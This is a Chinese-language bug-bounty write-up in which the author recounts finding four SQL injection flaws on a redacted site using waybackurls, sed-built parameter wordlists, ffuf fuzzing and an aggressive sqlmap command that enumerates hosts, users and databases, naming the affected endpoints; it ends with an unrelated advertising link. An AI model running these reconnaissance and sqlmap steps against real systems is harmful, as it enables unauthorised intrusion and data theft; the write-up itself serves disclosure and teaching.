今天來(lái)分享一下我是如何用幾分鐘發(fā)現某個(gè)漏洞賞金的目標多個(gè) SQL 注入漏洞的，接下來(lái)以目標域名 redacted.org 為例。

　　枚舉階段

　　首先我使用 waybackurls 工具查看目標網(wǎng)站上有哪些 URL，然后看到了很多 PHP 的文件，也許可以在其中找到 SQL 注入漏洞，使用命令過(guò)濾一些結果之后輸出到文件：

　　查看輸出的文件，發(fā)現了如圖中的內容：

　　看文件名感覺(jué)似乎有戲，接下來(lái)需要找一些可用的參數，需要制作一個(gè)參數名字典然后暴力破解這些頁(yè)面，搞起。

　　獲取參數

　　我們基于之前輸出的內容，將文件名和參數分離出來(lái)，然后去重：

　　cat php-files.txt| grep -i get | sed 's/.*.get//' | sort -u

　　接下來(lái)刪除 php 后綴，得到一個(gè)以文件名為關(guān)鍵詞的列表，只需在上一條命令后加上 cut -f1 -d 即可：

　　結果中有的有兩個(gè)單詞或者多個(gè)單詞的組合，但是我不知道其中那個(gè)單詞是參數，所以就想辦法將其拆分，經(jīng)過(guò)一頓搜索，發(fā)現可以用命令：

　　sed 's/[AZ]+/\n&/g'

　　我認為參數一般都是小寫(xiě)，所以需要將所有大寫(xiě)字符轉換為小寫(xiě)，且保留之前的內容：

　　接下來(lái)我們有了兩個(gè)參數字典可用，然后使用工具 FFUF 來(lái)進(jìn)行測試，先嘗試用全是小寫(xiě)字符的字典：

　　ffuf -w lowercase-parameters.txt -u "

　　但是沒(méi)有任何結果

　　老實(shí)說(shuō)，我很郁悶，但是突然想到一個(gè)方案，把請求的方法改成 POST 怎么樣?命令如下：

　　ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u

　　結果得到了 commitment & id 參數

　　接下來(lái)我可以對這些參數進(jìn)行測試了，復制請求的數據包內容到文件中，丟給 sqlmap 去測

　　漏洞利用

　　sqlmap 的命令如下：

　　sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast

　　漏洞測試成功，確實(shí)存在 SQL 注入漏洞

　　接下來(lái)使用同樣的方法，測試其他 URL ，結果我找到了三個(gè)同樣存在 SQL 注入漏洞的地方

　　第二個(gè) SQLI：帶有 id 參數的 ws_delComment.php

　　第三個(gè) SQLI：帶有 target 參數的 getTargets.php

　　第四個(gè)：mailing_lists.php 帶 list 參數

　　一共發(fā)現四個(gè) SQL 注入，太棒了

　　我向安全團隊報告了所有 SQL 注入漏洞并審核通過(guò)，他們在積極解決問(wèn)題，感謝大家的閱讀。
　?。?a href="http://www.hnsema.com/wechat/">邯鄲小程序開(kāi)發(fā)）